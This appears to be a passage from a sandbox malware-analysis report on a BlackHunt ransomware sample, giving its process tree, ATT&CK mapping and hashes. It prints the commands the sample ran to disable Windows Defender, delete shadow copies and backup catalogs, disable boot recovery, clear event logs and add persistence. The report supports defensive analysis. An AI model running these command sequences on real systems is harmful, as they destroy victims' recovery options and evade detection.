20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 50 PID 2664 wrote to memory of 2632 2664 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 54 PID 2664 wrote to memory of 2632 2664 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 54 PID 2664 wrote to memory of 2632 2664 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 54 PID 2664 wrote to memory of 2632 2664 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 54 PID 2664 wrote to memory of 2112 2664 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 56 PID 2664 wrote to memory of 2112 2664 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 56 PID 2664 wrote to memory of 2112 2664 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 56 PID 2664 wrote to memory of 2112 2664 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 56 PID 2664 wrote to memory of 2232 2664 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe 143 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe"C:\Users\Admin\AppData\Local\Temp\20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2664 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2724 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:2812
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2784 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2708
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2848 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:2852
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3000 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2108
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2292 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:1668
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2608
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:2952
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2972
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2956
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2748
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:484
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2636
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:2976
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2800
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:1788
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2632
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:892
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:2112
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:1508
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2232
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:2680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2096
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:2944
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2040
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:1312
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2208
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:2364
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:2932
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:2264
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2920
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1132
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:2940
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:628
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1912
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2280
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:2652
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:1564
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1620
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:1536
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:1320
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:1284
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:2256
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:568
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:2240
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:1196
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:760
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2616
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1832
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2876
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:2168
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:2604
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:2908
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:2020
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe" /F2⤵PID:2880
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe" /F3⤵
- Creates scheduled task(s)
PID:1580
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:1532
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1768
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:708
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:472
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:2440
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:2512
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:2248
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:1704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2268
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2220
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:1504
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2568
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:816
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:2364
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:1432
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:1440
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:544
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:328
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1860
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:2232
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:1456
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:800
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:2308
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:2692
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:2816
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:2068
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:2560
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2384
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:2860
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1756
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:1656
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:3004
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:1052
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:2400
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:332
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:1612
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:2224
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:2996
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:2008
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:2744
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2000
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:436
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:1572
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:1716
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:3060
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:1720
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:936
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:588
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:2652
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:1632
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:2720
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:2084
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:1432
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:688
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:2292
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1992
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:1104
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:884
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:2940
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:216
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:320
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2724
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:1320
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"3⤵
- Modifies Internet Explorer settings
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1276
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe"2⤵
- Deletes itself
PID:2936 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:2792
-
-
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2908
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2716
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:2476
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:2128
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
6Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5f82e0c021e4186fffcd1ba18df6cb77e
SHA1d06b26c6b92952fd2f2c1b04b7e323e6cca6a8f5
SHA256b2265a4f3a5ac52cc188a75b468cdb32f1b589600b7b30384217419106fdd8b9
SHA512efeaf162be620556f4f299628cf832568b9708c9e0979ecd629c121ff53a5c45ee9164603de3bdbeb861160ec61568fdfb408aa34a08b55b2baa710e1b83d87e
-
Filesize
12KB
MD53da579bf2e9a41b680102a0cd6c54251
SHA17e8d77de5c4e8ce24032f66951803a6eef135ddf
SHA25630c254cd45576b7201d6ec8b68a0ee77bf66a0fe6943486d073e4f2c17d79f6a
SHA5121ff22ae5e365749861b6ac1485391e0a14784f4dcf7c67170d4a1e73a42848a855382bd3765efcbf57e56feaddeeb6c5b1b319cdaa6d7a9626f373149cb52f11
-
Filesize
684B
MD5c4552769bf1c9b5f4fbad290782b056c
SHA1c5092d7e6bab7cf7fd72384ec783ef039d9f8f55
